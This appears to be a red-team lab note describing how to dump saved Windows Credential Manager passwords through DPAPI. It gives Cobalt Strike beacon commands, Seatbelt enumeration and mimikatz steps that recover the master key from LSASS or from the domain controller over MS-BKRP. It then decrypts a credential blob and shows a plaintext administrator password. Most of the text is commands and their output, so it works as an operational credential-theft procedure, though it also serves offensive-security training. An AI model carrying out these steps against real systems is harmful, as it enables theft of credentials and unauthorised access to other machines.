Secondary Categories: 02 - Cryptography 02 - Privilege Escalation Links: Dumping Credentials Data Protection API (DPAPI) Search Tag:π
Credential Manager
Description:
There are two concepts:
- Vaults : Holds records of encrypted credentials and a reference to encrypted blobs
- Credentials : The actually encrypted blob
Cobalt Strike
To enumerate the users vaults:
beacon> run vaultcmd /list
Currently loaded vaults:
Vault: Web Credentials
Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Location: C:\Users\bfarmer\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Vault: Windows Credentials
Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
Location: C:\Users\bfarmer\AppData\Local\Microsoft\Vault
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
Credentials in vault: Windows Credentials
Credential schema: Windows Domain Password Credential
Resource: Domain:target=TERMSRV/sql-2.dev.cyberbotic.io
Identity: SQL-2\Administrator
Hidden: No
Roaming: No
Property (schema element id,value): (100,2)Seatbelt
Another option is to run Seatbelt you can do this in Cobalt Strike using execute-assembly
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
====== WindowsVault ======
Vault GUID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Vault Type : Web Credentials
Item count : 0
Vault GUID : 77bc582b-f0a6-4e15-4e80-61736b6f3b29
Vault Type : Windows Credentials
Item count : 1
SchemaGuid : 3e0e35be-1b77-43e7-b873-aed901b6275b
Resource : String: Domain:target=TERMSRV/sql-2.dev.cyberbotic.io
Identity : String: SQL-2\Administrator
PackageSid : (null)
Credential :
LastModified : 9/6/2022 9:12:12 AMbased on the results above we know that the user has saved credentials for SQL2 we can find the specific credentials for these here:
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
[*] Listing: C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\
Size Type Last Modified Name
---- ---- ------------- ----
468b fil 09/06/2022 10:34:22 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
10kb fil 08/30/2022 08:42:59 DFBE70A7E5CC19A398EBF1B96859CE5DYou can also do this with Seatbelt:
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
====== WindowsCredentialFiles ======
Folder : C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\
FileName : 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
Description : Local Credential Data
MasterKey : bfc5090d-22fe-4058-8953-47f6882f549e
Accessed : 9/6/2022 10:50:44 AM
Modified : 9/6/2022 10:50:44 AM
Size : 468
FileName : DFBE70A7E5CC19A398EBF1B96859CE5D
Description : Local Credential Data
MasterKey : bfc5090d-22fe-4058-8953-47f6882f549e
Accessed : 9/6/2022 10:50:44 AM
Modified : 9/6/2022 10:50:44 AM
Size : 11036Seatbelt also provides the GUID master key used to encrypt the crednetials. The master keys are stored in the users roamer βProtectβ directoryβ¦ but they are also encrypted.
beacon> ls C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
[*] Listing: C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\
Size Type Last Modified Name
---- ---- ------------- ----
740b fil 08/15/2022 17:34:31 bfc5090d-22fe-4058-8953-47f6882f549e
928b fil 08/15/2022 17:34:31 BK-DEV
24b fil 08/15/2022 17:34:31 PreferredWhat we must do is decrypt the master key first to obtain the AES128/256 encrypting key use use that to decrypt the credentual blob. There are two ways to do thisβ¦
Option 1
If you have local admin access on the machine the key is cached in LSASS. Although it will not be in the cache if the user has not recently accessed/decrypted the credential.
beacon> mimikatz !sekurlsa::dpapi
Authentication Id : 0 ; 1075454 (00000000:001068fe)
Session : RemoteInteractive from 2
User Name : bfarmer
Domain : DEV
Logon Server : DC-2
Logon Time : 9/6/2022 9:09:54 AM
SID : S-1-5-21-569305411-121244042-2357301523-1104
[00000000]
* GUID : {bfc5090d-22fe-4058-8953-47f6882f549e}
* Time : 9/6/2022 11:27:44 AM
* MasterKey : 8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
* sha1(key) : 897f7bf129e6a898ff4e20e9789009d5385be1f3We can see that the GUID matches what we are looking for, so the key is:
8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
Option 2
Another way to get the master key which does not require elevation or interactuin with LSASS is to request it from the domain controller via Microssoft BackKey Remote Protocol (MS-BKRP). This is a failsafe option in case a user changes or forgets their password and to support various smart card functionality.
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc
[domainkey] with RPC
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
key : 8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
sha1: 897f7bf129e6a898ff4e20e9789009d5385be1f3This will only work if executed in the context of the user whos key we need to retrive.
Decrypting DPAPI
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
TargetName : Domain:target=TERMSRV/sql-2.dev.cyberbotic.io
UserName : SQL-2\Administrator
CredentialBlob : wIfY&cZ&d?QP9iMFEzckmj.34=@sg.*iResources:
| Title | URL |
|---|---|
| Seatbelt | https://github.com/GhostPack/Seatbelt |
Created Date: November 19th 2022 10:26
Last Modified Date: November 19th 2022 10:26